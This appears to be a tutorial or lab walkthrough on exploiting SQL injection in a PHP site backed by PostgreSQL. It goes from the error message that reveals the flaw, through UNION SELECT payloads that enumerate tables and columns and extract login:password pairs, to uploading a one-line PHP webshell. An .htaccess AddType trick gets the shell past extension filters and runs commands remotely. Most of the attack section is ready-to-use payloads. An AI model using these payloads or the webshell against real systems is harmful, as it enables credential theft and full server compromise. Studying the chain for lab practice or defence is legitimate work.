Detection And Exploitation of SQL Injection
This is the error message you get which tells you it is vulnerable to sqli
Warning: pg_exec(): Query failed: ERROR: unterminated quoted string at or near "'" LINE 1: SELECT * FROM pictures where cat=2' ^ in /var/www/classes/picture.php on line 17 ERROR: unterminated quoted string at or near "'" LINE 1: SELECT * FROM pictures where cat=2' ^
Exploitation of SQL injection
To do this the union attack can be used. So, we can have a query like this
UNION SELECT 1,2,3--
Exploiting SQL injection with UNION on Postgresql
Like for MySQL, exploiting SQL injections using UNION follows the steps
Find the number of columns to perform the UNION
Find a column with the right type to get information echoed in the page
Retrieve information from the database meta-tables
Retrieve information from other tables/databases
There are 2 methods to get the number of columns present
using `UNION SELECT` and increase the number of columns
using `ORDER BY` statement
Retrieving Information
Now that we know the number of columns, we can retrieve information from the database.
Compared to MySQL, PostgreSQL requires one step to get the UNION statement to work properly: the columns need to be of the same type between the two queries and the first query decided what type.
If we used the query
1 UNION SELECT 1,2,3,4
We can see the error message displayed
Warning: pg_exec(): Query failed: ERROR: UNION types character varying and integer cannot be matched
To avoid this error we can replace 1,2,3,4 with null,null,null,null . So to test for vulnerable columns we can do something like this
1 UNION SELECT 'test',null,null,null
We test this until we get the vulnerable column. If we find the vulnerable columns we can run stuffs like version() and current_user and current_database()
To retrive tablename from postgresql
SELECT tablename FROM pg_tables
To retrieve columnname
SELECT column_name FROM information_schema.columns
Full query
1 UNION SELECT null,tablename,null,null FROM pg_tables
1 UNION SELECT null,column_name,null,null FROM information_schema.columns
If the information_schema.columns stores table names then to retrieve the information
1 UNION SELECT null,table_name,column_name,null,null FROM information_schema.columns
We can also concatenate the table_name and column_name using the || operator
1 UNION SELECT null,table_name||':'||column_name,null,null FROM information_schema.columns
Using this information one can go ahead to build a query to retrieve informtation from this table
1 UNION SELECT null,login||':'||password,null,null FROM users;
Access to the Administration Pages and Code Execution
For this we can crack the password we got from the database so we can log in as the administrator user
Uploading a Webshell and Code Execution
Once we have access to the administration page, we can go ahead and look for a way to execute commands on the operating system
If there is an upload function,then we can go ahead to upload a php script
We can use a webshell as simple as this
<?php system($_GET['cmd']); ?>
If the upload functionality doesn’t allow .php extensions we can go on to try other stuffs. The goal is to look for ways to get remote code execution
Introduction to .htaccess
.htaccess are used to perform per-directory modification of the Apache configuration. They can be extremely dangerous if you can upload one that get interpreted by the server.
The most common way to gain command execution is to add a handler for an arbitrary extention
AddType application/x-httpd-php .blah
This line will tell Apache to interpret file with the extension .blah using the php engine. Since .blah files are less likely to be filtered by the application
Once we have uploaded the .htaccess file with the content above. We can now rename our file shell.php to shell.blah and upload
With this we can get commands execution
Getting commands Execution
We can execute our script by doing this
http://example.com/admin/uploads/shell.blah?cmd=id
With this we get the remote code execution